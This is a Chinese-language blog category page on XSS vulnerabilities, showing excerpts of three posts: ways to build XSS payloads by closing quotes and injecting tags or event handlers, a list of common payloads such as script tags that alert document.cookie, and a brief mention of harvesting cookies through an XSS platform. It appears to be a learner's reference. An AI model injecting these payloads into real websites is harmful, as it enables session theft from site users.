随笔分类 -  xss漏洞

xss的构造方式
摘要:xss的构造方式: 一,尖括号构造 <script>alert(1)</script> 二,事件构造 "onmouseover="alert(1) "onfocus="alert(document.cookie) 例如:已知输入点,首先先闭合双引号,则构造如下语句 ” onmouseover="al 阅读全文

posted @ 2019-07-11 14:36 呀小王呀 阅读(335) 评论(0) 推荐(0)

常用payload
摘要:'><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable) 阅读全文

posted @ 2019-06-09 19:44 呀小王呀 阅读(436) 评论(0) 推荐(0)

xss漏洞爆出cookie
摘要:1,<script>alert(decument.cookie)</script> 2,利用xss平台获取cookie 阅读全文

posted @ 2019-03-11 10:39 呀小王呀 阅读(426) 评论(0) 推荐(0)

导航